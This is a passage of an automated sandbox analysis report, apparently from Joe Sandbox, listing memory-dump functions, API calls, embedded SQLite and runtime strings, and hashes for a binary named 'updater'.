                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: a1574bf245171d0cb07f26318e618c122df8303bb4e2346caa85fcce9959273a
                                  • Instruction ID: d036dbab2b262bf1fad574f7c34312b4171349f504263ebb6c1460bde6c16ac9
                                  • Opcode Fuzzy Hash: a1574bf245171d0cb07f26318e618c122df8303bb4e2346caa85fcce9959273a
                                  • Instruction Fuzzy Hash: 7E21B776904109AFCF01EF95D890DDE7BB8BF68350F0152AAF5159B130DB72EA44CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013F8615: _strlen.LIBCMT ref: 013F865A
                                    • Part of subcall function 013F86CA: _strlen.LIBCMT ref: 013F871F
                                  • _strlen.LIBCMT ref: 013F710B
                                  Strings
                                  • sqlite_, xrefs: 013F7118
                                  • sqlite_master, xrefs: 013F722C, 013F7234
                                  • sqlite_temp_master, xrefs: 013F7221
                                  • UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;, xrefs: 013F7282
                                  • UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q, xrefs: 013F7261
                                  • sqlite_sequence, xrefs: 013F7249
                                  • UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q, xrefs: 013F7238
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strlen
                                  • String ID: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q$UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q$UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;$sqlite_$sqlite_master$sqlite_sequence$sqlite_temp_master
                                  • API String ID: 4218353326-1520438555
                                  • Opcode ID: 2d47bd10dd57dfc68278ae9b83e621a28611d9d8ab42f54ae0a77457dfce0aef
                                  • Instruction ID: 03a89968bdd1d2e9626f07fddc1283b47c3396a8cc1f91402e4126c3b48d85fa
                                  • Opcode Fuzzy Hash: 2d47bd10dd57dfc68278ae9b83e621a28611d9d8ab42f54ae0a77457dfce0aef
                                  • Instruction Fuzzy Hash: 0761D775B00216ABDF18AB6DCC45A6FBBB6AF94218F24406DEA01A7391DF31DC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strlen
                                  • String ID: $, $CREATE TABLE $CREATE TEMP TABLE
                                  • API String ID: 4218353326-108156782
                                  • Opcode ID: aeac11a7f8ed0ab11c275d3242cc51ae1d076e567235b9cb21c56f41123be1ce
                                  • Instruction ID: ba39ca1504e32d612d745aa412c2e0156d4087012bc23f180c248263551383f9
                                  • Opcode Fuzzy Hash: aeac11a7f8ed0ab11c275d3242cc51ae1d076e567235b9cb21c56f41123be1ce
                                  • Instruction Fuzzy Hash: 5F514D71E0021AAFCF14DFADC884A9EBBF4FF58218B15406DE919E7251DB34AE44CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __EH_prolog3_GS.LIBCMT ref: 01412738
                                  • _Maklocstr.LIBCPMT ref: 014127A1
                                  • _Maklocstr.LIBCPMT ref: 014127B3
                                  • _Maklocchr.LIBCPMT ref: 014127CB
                                  • _Maklocchr.LIBCPMT ref: 014127DB
                                  • _Getvals.LIBCPMT ref: 014127FD
                                    • Part of subcall function 0140B678: _Maklocchr.LIBCPMT ref: 0140B6A7
                                    • Part of subcall function 0140B678: _Maklocchr.LIBCPMT ref: 0140B6BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                  • String ID: false$true
                                  • API String ID: 3549167292-2658103896
                                  • Opcode ID: 5979d8b3c5ec57b55f73d01a93ad4beb51ba319ef43761f00e8042ff8f703ce1
                                  • Instruction ID: f0981d844bb77a1689cf58c5bfdeba67037f93d227a7ef3c2a748f8ef62dc867
                                  • Opcode Fuzzy Hash: 5979d8b3c5ec57b55f73d01a93ad4beb51ba319ef43761f00e8042ff8f703ce1
                                  • Instruction Fuzzy Hash: 512171B6D00314ABDF15EFA6D845ECF7B68EF25610F10801BF9199F2A5DBB09640CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strlen
                                  • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                  • API String ID: 4218353326-51310709
                                  • Opcode ID: 50e94af09f2374dcb96944c547bbb10ffde72751a479e320d32572e01f4558bf
                                  • Instruction ID: df0b263059d174e7042592dacfe4c076c71e76210f9c347a3765fadf16b8ea9b
                                  • Opcode Fuzzy Hash: 50e94af09f2374dcb96944c547bbb10ffde72751a479e320d32572e01f4558bf
                                  • Instruction Fuzzy Hash: 76113B36119F3324F755212F7C59B97BE884DB28743B4802FDD04B4491EE69EC834575
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: e5766cc4d7a12108b2af387902c45e69c056a547191e6ff4a8b3d3a26faf9def
                                  • Instruction ID: 99b848cb1607a65560e537bb688ed8dc09a0fc238c5cd5b79a430669ae34de54
                                  • Opcode Fuzzy Hash: e5766cc4d7a12108b2af387902c45e69c056a547191e6ff4a8b3d3a26faf9def
                                  • Instruction Fuzzy Hash: A261B272900306EFDB21DF69C880BAAB7E9EFDC314F14455BE955AB3A0E7B09901CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MaklocchrMaklocstr$H_prolog3_
                                  • String ID: false$true
                                  • API String ID: 2404127365-2658103896
                                  • Opcode ID: 74e9885bc1782d9fdd8b449e57ce80a4af6145f28abe5ffafbfb6d19d0d071a3
                                  • Instruction ID: 92c94f82f4c6f111d36281c7d87e1236ad4f844f8efb5c147136d2193530efc5
                                  • Opcode Fuzzy Hash: 74e9885bc1782d9fdd8b449e57ce80a4af6145f28abe5ffafbfb6d19d0d071a3
                                  • Instruction Fuzzy Hash: FD213BB5C00344ABDB15EFA6C884E9EBBB8EF65700F10845FF9059F265E7709640CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$___from_strstr_to_strchr
                                  • String ID:
                                  • API String ID: 3409252457-0
                                  • Opcode ID: f8777493d530d7507969db18aa70e557896c183cabfe14e7e4be113f38bfcc06
                                  • Instruction ID: 4d460cd9902488dcb5304ada4e8d7b5e015d4c053d217b11feed9649fa309159
                                  • Opcode Fuzzy Hash: f8777493d530d7507969db18aa70e557896c183cabfe14e7e4be113f38bfcc06
                                  • Instruction Fuzzy Hash: 0651E971E043076FDF25BFB99840A6EFBB8AF99324B04435FF910972B1E63585418B51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
                                    • Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E
                                  • _free.LIBCMT ref: 0142F14E
                                  • _free.LIBCMT ref: 0142F167
                                  • _free.LIBCMT ref: 0142F1A5
                                  • _free.LIBCMT ref: 0142F1AE
                                  • _free.LIBCMT ref: 0142F1BA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorLast
                                  • String ID: C
                                  • API String ID: 3291180501-1037565863
                                  • Opcode ID: 1810912efb5a930e341e718ba72d4a11c6791e8782b43e8d4f6be4c449921dfd
                                  • Instruction ID: dda79624af59930f40b2b5c4fde213c61cfe28dbd9c8649d3173b5a2e6f06eec
                                  • Opcode Fuzzy Hash: 1810912efb5a930e341e718ba72d4a11c6791e8782b43e8d4f6be4c449921dfd
                                  • Instruction Fuzzy Hash: 6BB13B75A0122A9BDB24DF18C894AAEB7B4FF58314F9045EED909A7360D771AEC4CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 0141D706
                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0141D794
                                  • __alloca_probe_16.LIBCMT ref: 0141D7BE
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0141D806
                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0141D820
                                  • __alloca_probe_16.LIBCMT ref: 0141D846
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0141D883
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$__alloca_probe_16$Info
                                  • String ID:
                                  • API String ID: 2298828789-0
                                  • Opcode ID: a74ee2dc79d94bb1379879ee2cbb8767542343c7369ee66621ea8afec484fe33
                                  • Instruction ID: d6055cea3f898efba0cdad451ba1ab02ac34af511b8a333fe1a67bdf0aa454b2
                                  • Opcode Fuzzy Hash: a74ee2dc79d94bb1379879ee2cbb8767542343c7369ee66621ea8afec484fe33
                                  • Instruction Fuzzy Hash: 1771A5B1D002569BEF219FE9DC48AEF7FB5AF15650F18041BED28A7278D7318804CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 0141F007
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0141F00F
                                  • _ValidateLocalCookies.LIBCMT ref: 0141F098
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0141F0C3
                                  • _ValidateLocalCookies.LIBCMT ref: 0141F118
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: a6ef9371b5a15b7e25b3bdb7553efd462a1b1593d358e6041088341b94278531
                                  • Instruction ID: 3b5db0f51cda574b91914bb20e3999019bd3b83cdf0800e237ac1a2b062c78f5
                                  • Opcode Fuzzy Hash: a6ef9371b5a15b7e25b3bdb7553efd462a1b1593d358e6041088341b94278531
                                  • Instruction Fuzzy Hash: 3741D574A00209AFCF10DF69C844A9E7FA5EF14318F14815BEA186B375D7319A4ACB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strlen$PathTemp
                                  • String ID: %s\etilqs_$\
                                  • API String ID: 1134129140-699725532
                                  • Opcode ID: 9c205824805f4de8cc4ca6d4d0e00cd343bddd5aae02a70c762b89f04cd67915
                                  • Instruction ID: 7c2334eb17c9dfb90601c53b4405c160e91756a40785d98caee2e488a0f7505e
                                  • Opcode Fuzzy Hash: 9c205824805f4de8cc4ca6d4d0e00cd343bddd5aae02a70c762b89f04cd67915
                                  • Instruction Fuzzy Hash: 06318E7190437B9EF720962D9C08EFB3BECAF64608F1404A9E455D31C1EB70DA88C761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetConsoleCP.KERNEL32 ref: 014317F9
                                  • __fassign.LIBCMT ref: 014319D8
                                  • __fassign.LIBCMT ref: 014319F5
                                  • WriteFile.KERNEL32(?,00000001,00000000,?,00000000), ref: 01431A3D
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01431A7D
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01431B29
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                  • String ID:
                                  • API String ID: 4031098158-0
                                  • Opcode ID: c6d8d75b6d4ef4d3c872c50678ca8549db0159a35f4d7f1199f0f5db1730f709
                                  • Instruction ID: 73177bd3afd89d7dd198b9f324dace1cd9ad8e53e5cc654b85ac18a007cc9c5e
                                  • Opcode Fuzzy Hash: c6d8d75b6d4ef4d3c872c50678ca8549db0159a35f4d7f1199f0f5db1730f709
                                  • Instruction Fuzzy Hash: 17D19B75D002589FDF15CFA8C8809EDBBB5FF88314F28016AE955BB361D730A946CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _ValidateScopeTableHandlers.LIBCMT ref: 01441554
                                  • __FindPESection.LIBCMT ref: 01441571
                                  • VirtualQuery.KERNEL32(83000000,CE5F1F10,0000001C,CE5F1F10,?,?,?), ref: 01441656
                                  • __FindPESection.LIBCMT ref: 01441693
                                  • _ValidateScopeTableHandlers.LIBCMT ref: 014416B3
                                  • __FindPESection.LIBCMT ref: 014416CD
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                  • String ID:
                                  • API String ID: 2529200597-0
                                  • Opcode ID: 5ec4f858a337f0186dc95efe3faf407ee8d5e69cf8c4ff97aecb4920c24072fa
                                  • Instruction ID: 23357d4d0bae21f2a6f127de70497c57f0d8c2edd6e6cb658b6e18cdd84a0abf
                                  • Opcode Fuzzy Hash: 5ec4f858a337f0186dc95efe3faf407ee8d5e69cf8c4ff97aecb4920c24072fa
                                  • Instruction Fuzzy Hash: 8CA1EF75E002159BEB20DF5DD980BAEB7A9EB04B14F15022AD909E73B1E731FC81CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 013DEAF7
                                  • int.LIBCPMT ref: 013DEB0E
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 013DEB48
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 013DEB5E
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 013DEB73
                                  • _Deallocate.LIBCONCRT ref: 013DEC3C
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskDeallocateFacet_Register
                                  • String ID:
                                  • API String ID: 55420841-0
                                  • Opcode ID: f938ff0e6d0a8fba20336a712ce9392bf690a1030387f6a881f2def658b34a07
                                  • Instruction ID: 49c1eb257d985602dab57e38521d7ac861589bfcf0fb61d8d0ebb2983c60d07d
                                  • Opcode Fuzzy Hash: f938ff0e6d0a8fba20336a712ce9392bf690a1030387f6a881f2def658b34a07
                                  • Instruction Fuzzy Hash: A9419676A04205DFCB28DF6CD4849AEBBF5EF54314B24462DE556D7390DB30AE41CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetLastError.KERNEL32(?,?,014210B0,01420EE6,0141E5FE), ref: 014210C7
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 014210D5
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 014210EE
                                  • SetLastError.KERNEL32(00000000,014210B0,01420EE6,0141E5FE), ref: 01421140
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: 3bcf0f25e5f5d1fba02601b0114d80fb58a5267f683c5cc6b431bb601b083ba3
                                  • Instruction ID: 8547cad8c77bc4da5617ed0d61f287eaba0d595d28d0386a072fcf4ff1d4cc88
                                  • Opcode Fuzzy Hash: 3bcf0f25e5f5d1fba02601b0114d80fb58a5267f683c5cc6b431bb601b083ba3
                                  • Instruction Fuzzy Hash: 4F012D7221E2336EA635267D6C84D773A56EB26AB4760432FE110451F8DFF104819250
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DeleteFileW.KERNEL32(00000000), ref: 013E3721
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 013E3728
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$AttributesDelete
                                  • String ID:
                                  • API String ID: 2910425767-0
                                  • Opcode ID: 23d084456057705816afbf78591218b45b12d520691f48d1e79a15eebe6f08a7
                                  • Instruction ID: b7f7b8eb4bd86e4ee05bdcd1e6751741ffbcc350f7db26212d15686fda5f0e2f
                                  • Opcode Fuzzy Hash: 23d084456057705816afbf78591218b45b12d520691f48d1e79a15eebe6f08a7
                                  • Instruction Fuzzy Hash: 8901B5BE286736AFD7252B7CACCC56E3AD87B0527AB100615F623C71C1CB24844243A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C144
                                  • int.LIBCPMT ref: 0140C15B
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • messages.LIBCPMT ref: 0140C17E
                                  • std::_Facet_Register.LIBCPMT ref: 0140C195
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C1B5
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C1C2
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
